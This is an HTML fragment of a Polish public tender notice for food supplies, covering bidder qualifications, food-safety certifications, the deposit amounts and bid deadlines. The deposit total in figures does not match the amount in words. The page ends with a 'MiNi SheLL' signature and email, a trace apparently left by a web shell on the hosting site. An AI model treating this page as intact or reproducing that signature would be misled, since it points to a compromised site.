w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający na potwierdzenie spełnienia tego warunku wymaga aby:<br/>1. Wykonawca został dopuszczony do produkcji lub obrotu artykułami <br/> spożywczymi- Ustawa z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności <br/> i żywienia (Dz. U. z 2023r. poz.1448 t.j.); <br/><br/>2. Wykonawca posiadał zgłoszoną działalność gospodarczą w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-spożywczymi, do wojewódzkiego inspektora jakości handlowej artykułów rolno-spożywczych–Ustawa z dnia 21 grudnia 2000r. roku o jakości handlowej artykułów rolno-spożywczych (Dz. U. z 2023r. poz.1980 t.j.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą brak podstaw do wykluczenia z powodu niespełnienia warunków określonych w art. 108 ust. 1 oraz 109 ust. 1 pkt. 1, 4 i 7 ustawy Prawo zamówień publicznych. Zamawiający uzna, że Wykonawca nie podlega wykluczeniu z postępowania, zgodnie z art. 108 ust. 1 oraz 109 ust. 1 pkt. 1, 4 i 7 ustawy Prawo zamówień<br/>publicznych, jeżeli z przedstawionych przez Wykonawcę oświadczeń i dokumentów wynikać będzie, że nie występują uwarunkowania określone w art.108 ust. 1 oraz 109 ust. 1 pkt. 1, 4 i 7 ustawy Prawo Zamówień Publicznych.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>1.W przypadku, gdy ofertę składa Wykonawca, który produkuje lub wprowadza do obrotu żywność pochodzenia niezwierzęcego lub zwierzęcego lub żywność zawierającą jednocześnie środki spożywcze pochodzenia niezwierzęcego i produkty pochodzenia zwierzęcego należy załączyć: <br/>a)	aktualną decyzję państwowego powiatowego inspektora sanitarnego o zatwierdzeniu zakładu w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących przedmiot zamówienia, o której mowa w art. 61 i 62 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2023r. poz. 1448 t.j. ) – jeżeli ustawa nakłada obowiązek posiadania takich uprawnień.<br/>lub <br/>b)	aktualną decyzję państwowego powiatowego inspektora weterynaryjnego o zatwierdzeniu zakładu w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących przedmiot zamówienia, o której mowa w art. 20 ustawy z dnia z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz. U. z 2023 r. poz. 872 t.j.) – jeżeli ustawa nakłada obowiązek posiadania takich uprawnień,<br/>lub<br/>c)	zaświadczenie o wpisie do rejestru zakładów wydane przez organa urzędowej kontroli na podstawie art. 62 ust. 1 pkt 4 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z . z 2023 r., poz.1448 t.j.) – jeżeli ustawa nakłada obowiązek posiadania takich uprawnień.<br/><br/>-W przypadku, gdy ofertę składa Wykonawca z Unii Europejskiej, spoza obszaru RP, do oferty należy załączyć aktualną decyzję wydaną przez właściwy organ danego kraju o zatwierdzeniu zakładu w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących tę część zamówienia wraz z weterynaryjnym numerem identyfikacyjnym w przypadku dotyczącym żywności (grupy produktów) pochodzenia zwierzęcego.<br/><br/>- W przypadku, gdy ofertę składa Wykonawca z krajów trzecich do oferty należy załączyć aktualną decyzję wydaną przez właściwy organ w danym kraju o dopuszczeniu zakładu do produkcji i na eksport na rynki innych krajów (w tym krajów Unii Europejskiej) w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących tę część zamówienia.<br/><br/>- Potwierdzenie o zgłoszeniu działalności gospodarczej w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-spożywczymi wydane przez wojewódzkiego inspektora jakości handlowej artykułów rolno-spożywczych, właściwego ze względu na miejsce zamieszkania lub siedzibę wykonawcy - na podstawie art. 12 ust. 1 ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (Dz. U. z 2023 r. poz. 1980 tj. ze zm.) - jeżeli ustawa nakłada obowiązek posiadania takich uprawnień.<br/><br/>W zakresie potwierdzenia braku podstaw wykluczenia Wykonawcy z postępowania:<br/>1. odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Prawo zamówień publicznych, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/><br/>Zamawiający nie wezwie do złożenia podmiotowych środków dowodowych, jeżeli można je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskaże w oświadczeniu, o którym mowa w pkt 1.1, dane umożliwiające dostęp do tych środków.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu potwierdzenia, że oferowane dostawy spełniają określone przez Zamawiającego wymagania oraz cechy, Zamawiający wymaga złożenia następujących przedmiotowych środków dowodowych:<br/>•Zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego sytemu HACCP. <br/>Przedłożone zaświadczenie winno potwierdzać, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP – podstawa prawna art. 59 i 73 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2023 r. poz.1448 t.j.)<br/>lub<br/>•Certyfikat wdrożenia BRC lub ISO 220000 lub IFS Food lub FSSC 22 000 wydanego przez firmy posiadające akredytację i uprawnienia Polskiego Centrum Akredytacji siedzibą w Warszawie lub krajowej organizacji akredytacyjnej dla danego kraju. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są<br/>niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia. art. 107 ust . 2 ustawy Prawo zamówień publicznych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Zamawiający żąda wniesienia wadium w łącznej wysokości 1 830,00 złotych (słownie: dwa tysiące dwieście złotych 00/100), w tym na:<br/>Zadanie 1-1 700,00 zł	(słownie: jeden tysiąc siedemset złotych 00/100)<br/>Zadanie 2-130,00 zł (słownie: sto trzydzieści złotych 00/100)<br/>Wykonawca składający ofertę na wybrane zadania dokonuje wpłaty wadium w wysokości wyszczególnionej dla poszczególnych zadań (części). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> ROZDZIAŁ VIII SWZ - Informacje dla wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) i wykonawców polegających na zasobach innych podmiotów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza wprowadzenie zmian umowy w sytuacjach określonych art. 455 ustawy Prawo zamówień publicznych oraz w załączniku nr 4 do SWZ - wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-09 07:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/2rblog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-09 08:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com